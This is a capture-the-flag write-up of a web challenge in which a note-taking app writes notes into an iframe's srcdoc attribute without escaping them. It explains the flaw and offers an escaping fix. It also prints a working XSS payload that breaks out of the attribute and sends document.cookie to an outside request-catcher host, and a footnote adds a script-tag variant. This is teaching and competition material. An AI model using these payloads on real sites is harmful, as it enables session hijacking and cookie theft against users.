All my friends warned me about xss, so I created this note taking app that only accepts “refined” Notes.

Category: Web

Solver: lukasrad02, aes

Flag: GPNCTF{3nc0d1ng_1s_th3_r00t_0f_4ll_3v1l}

Scenario





This challenge features a minimalistic note-taking app. We can enter a note into a text box and click a button to save it. The note then becomes available under a URL containing its UUID.



There is no source code provided for the challenge, so we can only look at the sources delivered to our browser. The HTML source mostly contains what one would expect from the screenshots. One interesting detail is a hidden iframe tag with the id noteframe. A quick test shows that this iframe displays the content of a note after it has been saved.

The HTML document references Tailwind CSS, DOMPurify and a custom JavaScript file. That script is responsible for saving a note when the “Add note” button is clicked. It takes the input, sanitizes it with DOMPurify, sends it to the server and changes the DOM to display the note read-only.

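```javascript
submit.addEventListener('click', (e) => {
    // Sanitize on the client only, then POST the result to the server
    const purified = DOMPurify.sanitize(note.value);
    fetch("/", {
        method: "POST",
        body: purified
    }).then(response => response.text()).then((id) => {
        // The server answers with the new note's UUID; show it in the URL bar
        window.history.pushState({page: ''}, id, `/${id}`);
        submit.classList.add('hidden');
        note.classList.add('hidden');
        noteframe.classList.remove('hidden');
        // Display the note through the DOM API (no server-side templating involved)
        noteframe.srcdoc = purified;
    });
});
```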

Apart from the note-taking app itself, we are given the address of an “admin bot” when starting a challenge instance. We can submit a note ID to the admin bot, and after a couple of seconds we receive a message saying that an admin has looked at our note.

Analysis

The admin bot is a typical element of web challenges that involve attacks against other users, such as cross-site scripting (XSS). The challenge description also mentions XSS. Hence, we most likely have to grab the admin’s cookie by crafting a note that abuses some vulnerability in the application and then direct the admin to that note.

Unfortunately, the application uses DOMPurify with its default configuration, which does not allow any scripting or other dangerous markup.

DOMPurify sanitizes HTML and prevents XSS attacks. You can feed DOMPurify with string full of dirty HTML and it will return a string (unless configured otherwise) with clean HTML. DOMPurify will strip out everything that contains dangerous HTML and thereby prevent XSS attacks and other nastiness.

– From the README on GitHub

DOMPurify is a widely used library with about 13k stars on GitHub, so finding a vulnerability in it is most likely not the intended solution for this challenge. Instead, we have to find some other aspect of the application that might be vulnerable.

One question we found especially interesting was how the HTML markup for the note view page is constructed. The script above only handles newly added notes by modifying the DOM in place, so the server is not involved there. When an existing note is requested by its UUID, however, there must be some server-side mechanism that writes the note text into the srcdoc attribute.



The fact that the server-side code was not provided made us suspect that the vulnerability might be relatively simple. We wondered whether the server-side templating might fail to handle special characters correctly, so that we could break out of the attribute. To test this, we submitted a single double quotation mark (") as a note and looked at the page source.
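Since the server-side code is not available, the following is only a guess at the kind of templating that would produce this behavior. The function `renderNotePage` is hypothetical: it interpolates the stored note into the `srcdoc` attribute without any escaping, so a lone `"` turns into `srcdoc="""`, which is the kind of malformed markup the browser flags.

```javascript
// Hypothetical reconstruction of the vulnerable server-side template.
// The real server code was not provided; renderNotePage is an assumption.
function renderNotePage(note) {
  // The note text is inserted into the attribute value as-is,
  // so a double quote in the note terminates srcdoc early.
  return `<iframe id="noteframe" srcdoc="${note}"></iframe>`;
}

console.log(renderNotePage('"'));
// prints: <iframe id="noteframe" srcdoc="""></iframe>
```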

It is important not to use the browser’s inspector right after submitting: the JavaScript that writes the note to the attribute uses the DOM APIs, which handle special characters correctly. Hence, the inspector view in the upper half of the screenshot above does not indicate any problems. However, when we request the page source from the server again, the browser immediately highlights an error in the markup.
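Setting `noteframe.srcdoc` through the DOM stores the value directly, so no escaping is needed on the client. A server that builds HTML as a string, on the other hand, has to escape the value itself. Below is a minimal sketch of that escaping, i.e. what the server-side template appears to skip. Both `escapeAttribute` and `renderNotePageSafely` are hypothetical names, not the challenge’s code.

```javascript
// Hypothetical helper: escape a string for use inside a double-quoted
// HTML attribute value. '&' is replaced first so that the entities
// introduced by the later replacements are not escaped a second time.
function escapeAttribute(value) {
  return value
    .replace(/&/g, "&amp;")
    .replace(/"/g, "&quot;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}

// Hypothetical fixed template: the note can no longer leave srcdoc.
function renderNotePageSafely(note) {
  return `<iframe id="noteframe" srcdoc="${escapeAttribute(note)}"></iframe>`;
}

console.log(renderNotePageSafely('" onload="alert(1)'));
// prints: <iframe id="noteframe" srcdoc="&quot; onload=&quot;alert(1)"></iframe>
```

Because the browser decodes the entities when it reads the attribute, the iframe still receives the original note text, including any harmless markup DOMPurify kept.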

We can now look for a way to inject JavaScript code. DOMPurify prevents us from simply writing a script tag to the page.¹ However, we can add any attribute to the iframe, even “dangerous” ones, because DOMPurify does not “know” that our input ends up inside the iframe tag. It considers (almost) anything that does not contain an opening tag (i.e., anything without a < character) to be normal text and therefore does not filter it.
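Why does a double quote survive DOMPurify? DOMPurify parses its input into a DOM tree and serializes the cleaned tree back to a string. A quote in the input ends up in a text node, and when text nodes are serialized (as with `innerHTML`), only `&`, `<`, `>` and the no-break space are escaped. The sketch below mimics just that text-escaping step; `serializeText` is a hypothetical name, and the sketch does not model how DOMPurify handles elements and attributes.

```javascript
// Mimics the escaping applied to *text nodes* when a DOM tree is
// serialized back to HTML. Quotes are deliberately left untouched:
// in text content they have no special meaning.
function serializeText(text) {
  return text
    .replace(/&/g, "&amp;")
    .replace(/\u00a0/g, "&nbsp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}

// Hypothetical test input that tries to add an attribute.
const input = '" onload="alert(1)';

// No '&', '<', '>' or no-break space: the input passes through unchanged.
console.log(serializeText(input) === input); // prints: true
```

A lone `>` in text, by contrast, comes back as `&gt;`.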

An attribute frequently used for XSS is onload, which defines JavaScript code to run once the element it is specified on has finished loading. Luckily, the iframe tag supports it.

Exploit

With these findings, we can craft a malicious note. We start with a quotation mark to break out of the srcdoc attribute and place an onload attribute after it. We do not close the onload value with a quotation mark ourselves, since the original closing quotation mark of the srcdoc attribute does that for us.

Our JavaScript code reads the cookies via document.cookie and sends them to a request catcher instance, an online service that lists all requests made to a subdomain of our choice.

The full note looks like this:

```
" onLoad="fetch('https://demo.requestcatcher.com/' + document.cookie)
```
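To see what the admin’s browser receives, the note can be plugged into a hypothetical unescaped template (`renderNotePage` is an assumption about the unpublished server code, not the real implementation). The note’s leading quote closes `srcdoc`, and the original closing quote of `srcdoc` now terminates the injected `onLoad` value.

```javascript
// Hypothetical server-side template (assumption; the real code is unknown).
function renderNotePage(note) {
  return `<iframe id="noteframe" srcdoc="${note}"></iframe>`;
}

const note = `" onLoad="fetch('https://demo.requestcatcher.com/' + document.cookie)`;
const html = renderNotePage(note);

console.log(html);
// prints: <iframe id="noteframe" srcdoc="" onLoad="fetch('https://demo.requestcatcher.com/' + document.cookie)"></iframe>
```

HTML attribute names are case-insensitive, so the parser treats `onLoad` exactly like `onload`.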



After submitting the note, we take the note ID from the URL, pass it to the admin bot, and wait for the request to appear at our request catcher instance.

We just have to decode the URL encoding (or make an educated guess that the encoded characters are the curly braces of the flag format) to obtain the flag GPNCTF{3nc0d1ng_1s_th3_r00t_0f_4ll_3v1l}.
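The curly braces arrive percent-encoded because the browser’s URL parser encodes `{` and `}` in the path of the fetched URL. The sketch below reproduces this with the WHATWG `URL` class (available globally in browsers and Node.js) and reverses it with `decodeURIComponent`. The cookie string `flag=...` is an assumption; the name of the admin’s cookie is not known from the challenge.

```javascript
// Assumed cookie value; the actual cookie name used by the admin bot is unknown.
const cookie = "flag=GPNCTF{3nc0d1ng_1s_th3_r00t_0f_4ll_3v1l}";

// Build the same URL the payload fetches. The WHATWG URL parser
// percent-encodes '{' and '}' in the path component.
const url = new URL("https://demo.requestcatcher.com/" + cookie);
console.log(url.pathname);
// prints: /flag=GPNCTF%7B3nc0d1ng_1s_th3_r00t_0f_4ll_3v1l%7D

// Undo the percent-encoding to recover the original cookie string.
const recovered = decodeURIComponent(url.pathname.slice(1));
console.log(recovered === cookie); // prints: true
```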

---

¹ While writing this writeup, we noticed that relying on client-side input sanitization could also be an issue: we could send arbitrary, unsanitized input directly to the HTTP POST endpoint. During the CTF, we did not spend any time on this, as we found the issue described in this writeup pretty quickly. However, we were curious enough to do a quick test using `"><script>fetch('https://demo.requestcatcher.com/' + document.cookie);</script>` as a note.

This revealed that some additional sanitization happens on the server side, as the `>` was replaced with `&gt;` and the script tag was missing completely. We guess that DOMPurify was only used on the client side as a hint at what the server does, so that people don’t get stuck on wrong approaches. There might be other bugs caused by double sanitization. However, these typically only cause less critical problems, such as escape sequences being shown to the user instead of the characters they represent, and do not allow injecting malicious code. Therefore, we did not analyze this further.